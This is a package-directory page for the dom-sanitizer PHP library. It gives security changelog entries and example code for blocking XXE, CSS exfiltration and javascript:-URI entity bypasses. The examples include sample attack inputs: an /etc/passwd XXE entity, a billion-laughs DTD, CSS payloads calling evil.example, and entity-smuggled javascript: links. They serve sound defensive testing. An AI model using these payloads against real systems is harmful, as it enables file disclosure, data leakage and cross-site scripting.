Code Weaver
Helps Laravel developers discover, compare, and choose open-source packages. See popularity, security, maintainers, and scores at a glance to make better decisions.
Dom Sanitizer Laravel Package

rhukster/dom-sanitizer

MIT-licensed PHP 7.3+ DOM/SVG/MathML sanitizer using DOMDocument and DOMPurify-based allowlists. Remove dangerous tags/attributes, strip namespaces and PHP/HTML/XML tags, and optionally compress output. Supports HTML, SVG, and MathML modes.

1.0.11

Security

  • Harden loadDocument against XXE and entity-expansion attacks

  • Strip DOCTYPE and ENTITY declarations from sanitizer input before parsing, then call loadXML/loadHTML with LIBXML_NONET so the parser cannot make outbound filesystem or network requests for external entities/DTDs. libxml_disable_entity_loader is also called on PHP < 8 (it is a deprecated no-op on PHP 8+, where external entity loading is already disabled by default).

  • Closes the dom-sanitizer half of GHSA-3446-6mgw-f79p (filed against Grav, which uses this library as its SVG sanitizer). The companion fix in Grav core is in VectorImageMedium's dimension reader.

  • Two new XXE regression tests added to DomSanitizerTest:

    • file:// SYSTEM entity payload — must not expand into /etc/passwd
    • billion-laughs DOCTYPE — must not balloon memory
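The loading discipline described above, written out as an added example (this is not the library's own loadDocument; the class name, the reject-on-DTD policy and the sample payloads are assumptions for illustration). Rather than trying to parse a document that carries a DOCTYPE or ENTITY declaration, it refuses it outright, and the parse itself runs with LIBXML_NONET and with entity substitution left off:

```php
<?php
declare(strict_types=1);

/**
 * Added example, not the library's code: load untrusted SVG/XML without
 * letting libxml resolve external entities or expand entity bombs.
 */
final class HardenedXmlLoader
{
    /** True if the input carries a <!DOCTYPE ...> or <!ENTITY ...> declaration. */
    public static function hasDtd(string $xml): bool
    {
        return (bool) preg_match('/<!\s*(DOCTYPE|ENTITY)\b/i', $xml);
    }

    /** Parse, or throw. Assumption: a sanitizer never needs a DTD, so any is hostile. */
    public static function load(string $xml): DOMDocument
    {
        if (self::hasDtd($xml)) {
            throw new InvalidArgumentException('DOCTYPE/ENTITY declarations are not allowed');
        }
        if (\PHP_VERSION_ID < 80000) {
            // Needed on PHP 7.x; deprecated and a no-op on PHP 8+.
            libxml_disable_entity_loader(true);
        }

        $prev = libxml_use_internal_errors(true);
        $doc = new DOMDocument();
        // Both default to false; set explicitly so a later edit cannot flip them silently.
        $doc->resolveExternals = false;
        $doc->substituteEntities = false;
        // LIBXML_NONET forbids network access during the load. Deliberately NOT
        // passing LIBXML_NOENT (entity substitution) or LIBXML_DTDLOAD.
        $ok = $doc->loadXML($xml, LIBXML_NONET);
        libxml_clear_errors();
        libxml_use_internal_errors($prev);

        if ($ok === false) {
            throw new InvalidArgumentException('XML parse error');
        }
        return $doc;
    }
}

// Constructed payloads for demonstration: a file:// SYSTEM entity, a small
// billion-laughs DOCTYPE, and a benign SVG.
$xxe = '<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
     . '<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>';
$lol = '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
     . '<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]><lolz>&lol2;</lolz>';
$benign = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>';

foreach (['xxe' => $xxe, 'billion-laughs' => $lol, 'benign' => $benign] as $name => $payload) {
    try {
        $doc = HardenedXmlLoader::load($payload);
        echo "$name: parsed, root <{$doc->documentElement->tagName}>\n";
    } catch (InvalidArgumentException $e) {
        echo "$name: rejected ({$e->getMessage()})\n";
    }
}
```

The two hostile inputs are refused before libxml ever sees the DTD, which is what the regression tests listed above exercise; the benign SVG parses. Passing LIBXML_NONET alone is not enough on its own: an inline `<!ENTITY ... SYSTEM "file://...">` is a filesystem read, not a network request, so the declaration check (or PHP 8's default of not loading external entities) is what closes the file:// case.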
1.0.10

Security

  • Fixed CSS injection via SVG/HTML <style> text content (GHSA-93vf-569f-22cq). DOMSanitizer::sanitize() allowed <style> elements in both SVG and HTML mode but never inspected their text content, letting CSS url() references and @import rules pass through unfiltered. An attacker could exfiltrate the page URL to an external host, load arbitrary stylesheets, or use CSS attribute-selector tricks to leak form token values.

    • The fix walks <style> text nodes and drops the element if it contains @import, url(...) with an external scheme (http:, https:, ftp:, //, data:), or legacy expression().
    • CSS hex escapes such as \75 rl(...) (which decodes to url(...)) are decoded before matching, so escape-based bypasses are caught.
    • Fragment references such as url(#gradientId) are preserved so SVG <defs>, gradients, filters, and masks continue to work normally.
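An added example of the <style> content check described above, written for this page rather than taken from the library: decode CSS hex escapes first, then drop the element on @import, expression(), or a url() whose target uses an external scheme, while keeping same-document url(#id) references. The class name, the mbstring dependency, and the sample stylesheets are assumptions:

```php
<?php
declare(strict_types=1);

/**
 * Added example, not the library's code. Assumes ext-mbstring for mb_chr().
 */
final class StyleContentCheck
{
    /** Decode CSS hex escapes (backslash, 1-6 hex digits, optional single whitespace). */
    public static function decodeCssEscapes(string $css): string
    {
        return preg_replace_callback(
            '/\\\\([0-9a-fA-F]{1,6})\s?/',
            static function (array $m): string {
                return mb_chr((int) hexdec($m[1]), 'UTF-8') ?: '';
            },
            $css
        ) ?? $css;
    }

    /** True if the stylesheet text should cause the <style> element to be dropped. */
    public static function isDangerous(string $css): bool
    {
        $css = strtolower(self::decodeCssEscapes($css));
        // Strip comments so they cannot be used to split a keyword.
        $css = preg_replace('#/\*.*?\*/#s', '', $css) ?? $css;

        if (preg_match('/@import\b/', $css) || preg_match('/\bexpression\s*\(/', $css)) {
            return true;
        }
        if (preg_match_all('/url\s*\(\s*([^)]*)\)/', $css, $matches)) {
            foreach ($matches[1] as $target) {
                $target = trim($target, " \t\r\n\"'");
                if ($target === '' || $target[0] === '#') {
                    continue; // same-document fragment reference: allowed
                }
                if (preg_match('#^(?:https?:|ftp:|data:|//)#', $target)) {
                    return true; // external scheme: exfiltration or remote stylesheet
                }
            }
        }
        return false;
    }

    /** Remove every <style> element that fails the check; returns how many were removed. */
    public static function pruneStyles(DOMDocument $doc): int
    {
        $removed = 0;
        // Snapshot the live NodeList before mutating the tree.
        foreach (iterator_to_array($doc->getElementsByTagName('style')) as $style) {
            if (self::isDangerous($style->textContent)) {
                $style->parentNode->removeChild($style);
                $removed++;
            }
        }
        return $removed;
    }
}

// Constructed samples: the 'escaped' one is "\75 rl(" i.e. url( after decoding.
$samples = [
    'import'    => '@import "https://evil.example/x.css";',
    'escaped'   => '\\75 rl(https://evil.example/leak)',
    'attr-leak' => 'input[value^="a"]{background:url(//evil.example/?a)}',
    'fragment'  => 'rect{fill:url(#grad)}',
    'plain'     => 'rect{fill:red}',
];
foreach ($samples as $name => $css) {
    printf("%-10s %s\n", $name, StyleContentCheck::isDangerous($css) ? 'drop' : 'keep');
}
```

The first three samples are dropped and the last two kept. Decoding before matching matters: a regex for `url(` run on the raw text would miss `\75 rl(`, and `@\69 mport` likewise, but the browser's CSS parser decodes both.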
1.0.9

Security & Bug Fixes

Security

  • Fixed SVG sanitizer bypass via ASCII whitespace entities (https://github.com/rhukster/dom-sanitizer/issues/6). Addresses a bypass of the CVE-2026-33172 fix in which character entities encoding tab, newline, and carriage return could be used to smuggle javascript: URIs past the regex-based sanitization: browsers ignore those characters inside a URL scheme, but a regex run over the raw markup never sees the decoded value. The fix adds DOM-level URL scheme validation that operates on decoded attribute values, eliminating this entire class of entity-encoding bypasses.
  • Added comprehensive XSS event handler tests for GHSA-gxwg-x2jg-q44j to improve test coverage of onload, onclick, onerror, onmouseover, and other event handler stripping across SVG and HTML contexts.
  • Added SECURITY.md with instructions for private vulnerability reporting.
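An added example of the DOM-level scheme check described in the first item above; it is not the library's implementation. The attribute list, the allowed-scheme list and the sample SVG are assumptions. The point it demonstrates is that a regex over the raw markup cannot find `javascript:` once a tab entity sits inside the scheme, while the DOM hands the sanitizer the decoded value:

```php
<?php
declare(strict_types=1);

/**
 * Added example, not the library's code: validate URL-bearing attributes on
 * the decoded DOM value, never on the raw markup.
 */
final class UrlAttributeCheck
{
    /** Attributes treated as URL-bearing (assumed list). */
    private const URL_ATTRS = ['href', 'xlink:href', 'src', 'action', 'formaction', 'data'];

    /** Schemes allowed on external references (assumed list); anything else is dropped. */
    private const ALLOWED_SCHEMES = ['http', 'https', 'mailto', 'tel'];

    public static function isSafeUrl(string $value): bool
    {
        // Browsers ignore tab/newline/CR anywhere in a URL and strip leading
        // C0 controls and spaces, so remove those before looking for a scheme.
        $v = preg_replace('/[\x00-\x20]+/', '', $value) ?? '';
        if ($v === '' || $v[0] === '#' || $v[0] === '/' || $v[0] === '.') {
            return true; // fragment, absolute-path or relative reference
        }
        if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $v, $m)) {
            return true; // no scheme at all: relative URL
        }
        return in_array(strtolower($m[1]), self::ALLOWED_SCHEMES, true);
    }

    /** Remove unsafe URL attributes from every element; returns the count removed. */
    public static function stripUnsafeUrls(DOMDocument $doc): int
    {
        $removed = 0;
        $xpath = new DOMXPath($doc);
        // Snapshot the result set before mutating.
        foreach (iterator_to_array($xpath->query('//@*')) as $attr) {
            // nodeName keeps the "xlink:" prefix, so the list above can match it.
            if (!in_array(strtolower($attr->nodeName), self::URL_ATTRS, true)) {
                continue;
            }
            // ->value is the entity-decoded string, e.g. "java\tscript:alert(1)".
            if (!self::isSafeUrl($attr->value)) {
                $attr->ownerElement->removeAttributeNode($attr);
                $removed++;
            }
        }
        return $removed;
    }
}

// Constructed SVG: &#9; (tab) and &#10; (newline) inside the scheme.
$svg = '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
     . '<a xlink:href="java&#9;script:alert(1)"><text>x</text></a>'
     . '<a href="jav&#10;ascript:alert(2)"><text>y</text></a>'
     . '<a href="https://example.com/ok"><text>z</text></a>'
     . '<use xlink:href="#icon"/>'
     . '</svg>';

// The raw-markup regex the bypass defeated:
echo 'raw regex sees javascript: ', (preg_match('/javascript:/i', $svg) ? 'yes' : 'no'), "\n";

$doc = new DOMDocument();
$doc->loadXML($svg, LIBXML_NONET);
$n = UrlAttributeCheck::stripUnsafeUrls($doc);
echo "attributes removed: $n\n";
echo $doc->saveXML($doc->documentElement), "\n";
```

The raw regex reports no match, yet the DOM pass removes both javascript: attributes and leaves the https: link and the #icon reference intact. Because the check runs on the decoded value, it does not matter whether the attacker used decimal, hexadecimal, or mixed-case entities, or some other encoding libxml resolves: the sanitizer always sees the same string the browser would.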

Bug Fixes

  • Fixed SVG filter elements being incorrectly removed (https://github.com/rhukster/dom-sanitizer/issues/5) — SVG filter tags (feGaussianBlur, feBlend, feColorMatrix, etc.) were defined in camelCase but compared against lowercased tag names, causing all filter elements to be silently stripped during sanitization.